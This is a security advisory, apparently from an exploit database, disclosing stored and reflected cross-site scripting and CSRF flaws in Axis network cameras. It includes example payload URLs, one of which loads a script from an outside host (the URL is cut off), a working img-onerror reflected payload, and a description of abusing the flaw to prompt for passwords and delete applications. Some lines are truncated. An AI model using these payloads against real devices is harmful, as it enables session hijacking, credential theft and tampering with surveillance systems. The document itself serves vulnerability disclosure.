Axis Network Cameras - Multiple Vulnerabilities

ID 1337DAY-ID-24995
Type zdt
Reporter Orwelllabs
Modified 2016-04-11T00:00:00


Exploit for hardware platform in category web applications

                                            I. ADVISORY INFORMATION
Title: Axis Network Cameras Multiple Cross-site scripting
Vendor: Axis Communications
Class: Improper Input Validation [CWE-20]
CVE Name: CVE-2015-8256
Remotely Exploitable: Yes
Locally Exploitable: No
OLSA-ID: OLSA-2015-8256
Adivisory URL:
II. Background
Axis is the market leader in network video, invented the world’s first
network camera back in 1996 and we’ve been innovators in video surveillance
ever since. Axis network video products are installed in public places and
areas such as retail chains, airports, trains, motorways, universities,
prisons, casinos and banks.
III. vulnerability
AXIS Network Cameras are prone to multiple (stored/reflected) cross-site
scripting vulnerability.
IV. technical details
These attack vectors allow you to execute an arbitrary javascript code in
the user browser (session) with this steps:
# 1 Attacker injects a javascript payload in the vulnerable page:
This will create a entry in the genneral log file (/var/log/messages) So,
when the user is viewing the log 'system options' -> 'support' -> 'Logs &
will be displayed a prompt for the password of the current user
However, due to CSRF presented is even possible to perform all actions
already presented: create, edit and remove users and applications, etc. For
example, to delete an application "axis_update" via SXSS:
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script src="http://
* A reflected cross-site scripting affects all models of AXIS devices on
the same parameter:
# Other Vectors
http://{axishost}/view/custom_whiteBalance.shtml?imagePath=<img src="xs"
onerror=alert(7) /><!--
And many, many others...
V. Impact
allows to run arbitrary code on a victim's browser and computer if combined
with another flaws in the same devices.
VI. Affected products
Multiple Axis Network products.
VII. solution
It was not provided any solution to the problem.
VIII. Credits
The vulnerability has been discovered by SmithW from OrwellLabs
IX. Legal Notices
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
X. Vendor solutions and workarounds
There was no response from the vendor.

# [2018-01-04]  #